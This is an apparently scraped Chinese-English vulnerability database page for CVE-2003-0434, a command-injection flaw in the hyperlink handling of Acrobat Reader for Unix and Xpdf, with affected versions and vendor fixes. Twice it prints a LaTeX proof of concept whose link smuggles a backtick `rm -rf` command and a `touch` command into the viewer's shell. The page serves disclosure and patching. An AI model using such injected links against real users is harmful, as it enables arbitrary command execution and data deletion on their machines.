CVE-2003-0434
CVSS7.5
发布时间 :2003-07-24 00:00:00
修订时间 :2016-10-17 22:33:51
NMCOES    

[原文]Various PDF viewers including (1) Adobe Acrobat 5.06 and (2) Xpdf 1.01 allow remote attackers to execute arbitrary commands via shell metacharacters in an embedded hyperlink.


[CNNVD]多家PDF厂商超链接任意命令执行漏洞(CNNVD-200307-028)

        
        Acrobat Reader/Xpdf是可以用于查看PDF文件的处理程序。
        Acrobat Reader/Xpdf没有正确过滤超链接中的内容,远程攻击者可以利用这个漏洞诱使用户打开恶意PDF文件,导致包含的恶意命令以用户进程权限执行。
        PDF文件允许包含超链接信息,由于PDF在处理超链接时没有过滤链接内容,并且PDF查看程序通过'sh -c'调用来处理请求,因此,攻击者构建特殊的恶意超链接,可导致嵌入的命令直接传递给SHELL执行,成功利用此漏洞,命令可能以用户进程权限执行。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:redhat:enterprise_linux:2.1::advanced_server
cpe:/o:redhat:linux:7.1Red Hat Linux 7.1
cpe:/o:redhat:linux:8.0Red Hat Linux 8.0
cpe:/o:redhat:enterprise_linux:2.1::enterprise_server
cpe:/o:redhat:linux:7.2Red Hat Linux 7.2
cpe:/o:redhat:linux:9.0Red Hat Linux 9.0
cpe:/o:mandrakesoft:mandrake_linux_corporate_server:2.1MandrakeSoft Mandrake Linux Corporate Server 2.1
cpe:/a:xpdf:xpdf:1.1
cpe:/a:adobe:acrobat:5.0.6Adobe Acrobat 5.0.6
cpe:/o:redhat:linux:7.3Red Hat Linux 7.3
cpe:/o:redhat:linux_advanced_workstation:2.1::itanium
cpe:/o:mandrakesoft:mandrake_linux:9.1MandrakeSoft Mandrake Linux 9.1
cpe:/o:mandrakesoft:mandrake_linux:9.0MandrakeSoft Mandrake Linux 9.0
cpe:/o:redhat:enterprise_linux:2.1::workstation

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:664Code Execution Vulnerability in XPDF PDF Viewer
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0434
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0434
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-028
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2003-June/005719.html
(UNKNOWN)  FULLDISC  20030613 -10Day CERT Advisory on PDF Files
http://marc.info/?l=bugtraq&m=105777963019186&w=2
(UNKNOWN)  BUGTRAQ  20030709 xpdf vulnerability - CAN-2003-0434
http://www.kb.cert.org/vuls/id/200132
(UNKNOWN)  CERT-VN  VU#200132
http://www.mandriva.com/security/advisories?name=MDKSA-2003:071
(UNKNOWN)  MANDRAKE  MDKSA-2003:071
http://www.redhat.com/support/errata/RHSA-2003-196.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:196
http://www.redhat.com/support/errata/RHSA-2003-197.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:197

- 漏洞信息

多家PDF厂商超链接任意命令执行漏洞
高危 输入验证
2003-07-24 00:00:00 2007-02-07 00:00:00
远程  
        
        Acrobat Reader/Xpdf是可以用于查看PDF文件的处理程序。
        Acrobat Reader/Xpdf没有正确过滤超链接中的内容,远程攻击者可以利用这个漏洞诱使用户打开恶意PDF文件,导致包含的恶意命令以用户进程权限执行。
        PDF文件允许包含超链接信息,由于PDF在处理超链接时没有过滤链接内容,并且PDF查看程序通过'sh -c'调用来处理请求,因此,攻击者构建特殊的恶意超链接,可导致嵌入的命令直接传递给SHELL执行,成功利用此漏洞,命令可能以用户进程权限执行。
        

- 公告与补丁

        厂商补丁:
        Adobe
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.adobe.com

        Xpdf
        ----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.foolabs.com/xpdf/

- 漏洞信息 (22771)

Adobe Acrobat Reader (UNIX) 5.0 6,Xpdf 0.9x Hyperlinks Arbitrary Command Execution (EDBID:22771)
linux remote
2003-06-13 Verified
0 Martyn Gilmore
N/A [点击下载]
source: http://www.securityfocus.com/bid/7912/info

A vulnerability has been reported for multiple PDF viewers for Unix variant operating systems. The problem is said to occur when hyperlinks have been enabled within the viewer. Allegedly, by placing a specially formatted hyperlink within a PDF file it is possible to execute arbitrary shell commands when a user clicks the link. This is due to the PDF viewer invoking an external application, via a call to 'sh -c', to handle the request.

Successful exploitation of this vulnerability could potentially allow an attacker to execute arbitrary commands on a target system with the privileges of the user invoking the PDF document.

It should be noted that this vulnerability may be similar to that described in BID 1624.

** Reports suggest that the fixes supplied by Red Hat and Mandrake Linux do not adequately fix the problem. Specifically, the fixes make changes to xpdf to filter out back quote characters. The problem lies in the fact that other shell metacharacters are not filtered. Thus it may still be possible for attackers to execute arbitrary commands. Red Hat has released updated advisories to correct this oversight. 

\documentclass[11pt]{minimal}
\usepackage{color}
\usepackage[urlcolor=blue,colorlinks=true,pdfpagemode=none]{hyperref}
\begin{document}
\href{prot:hyperlink with stuff, say, `rm -rf /tmp/abc`; touch /tmp/pqr}{\textt\t{Click me}}
\end{document}		

- 漏洞信息

9293
Multiple PDF Viewers Embedded Hyperlink Shell Metacharacter Command Execution

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-06-14 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor PDF Hyperlinks Arbitrary Command Execution Vulnerability
Input Validation Error 7912
Yes No
2003-06-13 12:00:00 2009-07-11 10:06:00
The discovery of this vulnerability has been credited to Martyn Gilmore <gilmore@floraxion.com>.

- 受影响的程序版本

Yellow Dog Linux 3.0
Xpdf Xpdf 2.0 1
+ Conectiva Linux 9.0
+ Conectiva Linux 9.0
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.1
+ Terra Soft Solutions Yellow Dog Linux 3.0
Xpdf Xpdf 2.0
Xpdf Xpdf 1.0 1
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
+ Gentoo Linux 1.2
+ Gentoo Linux 1.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.2
Xpdf Xpdf 1.0 0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
+ Debian Linux 3.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Workstation 8.0
Xpdf Xpdf 0.93
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
Xpdf Xpdf 0.92
+ Conectiva Linux 7.0
+ Conectiva Linux 7.0
+ Conectiva Linux 7.0
+ Sun Linux 5.0.6
+ Sun Linux 5.0.5
+ Sun Linux 5.0.5
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0.3
+ Sun Linux 5.0.3
+ Sun Linux 5.0
+ Sun Linux 5.0
+ Sun Linux 5.0
+ Turbolinux Turbolinux 6.0
+ Turbolinux Turbolinux 6.0
+ Turbolinux Turbolinux 6.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Workstation 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux 6.0
Sun Linux 5.0.6
Sun Linux 5.0.5
Sun Linux 5.0.3
Sun Linux 5.0
+ Sun LX50
RedHat Linux Advanced Work Station 2.1
RedHat Linux 9.0 i386
RedHat Linux 8.0 i386
RedHat Linux 7.3 i386
RedHat Linux 7.2 ia64
RedHat Linux 7.2 i386
RedHat Linux 7.1
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Adobe Acrobat Reader (UNIX) 5.0 6

- 漏洞讨论

A vulnerability has been reported for multiple PDF viewers for Unix variant operating systems. The problem is said to occur when hyperlinks have been enabled within the viewer. Allegedly, by placing a specially formatted hyperlink within a PDF file it is possible to execute arbitrary shell commands when a user clicks the link. This is due to the PDF viewer invoking an external application, via a call to 'sh -c', to handle the request.

Successful exploitation of this vulnerability could potentially allow an attacker to execute arbitrary commands on a target system with the privileges of the user invoking the PDF document.

It should be noted that this vulnerability may be similar to that described in BID 1624.

** Reports suggest that the fixes supplied by Red Hat and Mandrake Linux do not adequately fix the problem. Specifically, the fixes make changes to xpdf to filter out back quote characters. The problem lies in the fact that other shell metacharacters are not filtered. Thus it may still be possible for attackers to execute arbitrary commands. Red Hat has released updated advisories to correct this oversight.

- 漏洞利用

The following proof of concept was provided by Andries.Brouwer@cwi.nl:

\documentclass[11pt]{minimal}
\usepackage{color}
\usepackage[urlcolor=blue,colorlinks=true,pdfpagemode=none]{hyperref}
\begin{document}
\href{prot:hyperlink with stuff, say, `rm -rf /tmp/abc`; touch /tmp/pqr}{\textt\t{Click me}}
\end{document}

The source of a sample PDF file has been released which demonstrates this issue.

- 解决方案

Red Hat has released an updated advisory RHSA-2003:196-02 to address this issue. Information regarding obtaining and applying fixes is available in the referenced advisory.

Conectiva has released advisory (CLA-2003:674) to address this issue. Fixes are available below.

Gentoo Linux has released advisory 200306-11 to address this issue. Affected users are advised to issue the following commands to update vulnerable systems:

emerge sync
emerge xpdf
emerge clean

Gentoo Linux has released advisory 200306-12 to address this issue. Affected users are advised to issue the following commands to update vulnerable systems:

emerge sync
emerge acroread
emerge clean

TurboLinux has released an advisory. Affected users are advised to use the turbopkg tool to apply the updates. Further information is available in the referenced advisory.

Mandrake has released an updated advisory (MDKSA-2003:071-1) that addresses this issue. Please see the attached advisory for details on obtaining and applying fixes. The previous Mandrake advisory (MDKSA-2003:071) did not properly address all of these issues.

Sun has released a fix for Sun Linux 5.0.6.

Red Hat has released an updated advisory (RHSA-2003:197-10) that addresses this issue on Enterprise platforms. Please see the attached advisory for further details. These fixes are only available via the Red Hat Network.

Yellow Dog has released an advisory and fixes to address this issue.

The following fixes are available:


Xpdf Xpdf 0.92

Xpdf Xpdf 1.0 1

Xpdf Xpdf 1.0 0

Xpdf Xpdf 2.0 1

Yellow Dog Linux 3.0

RedHat Linux 7.1

RedHat Linux 7.2 i386

RedHat Linux 7.2 ia64

RedHat Linux 7.3 i386

RedHat Linux 8.0 i386

RedHat Linux 9.0 i386

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站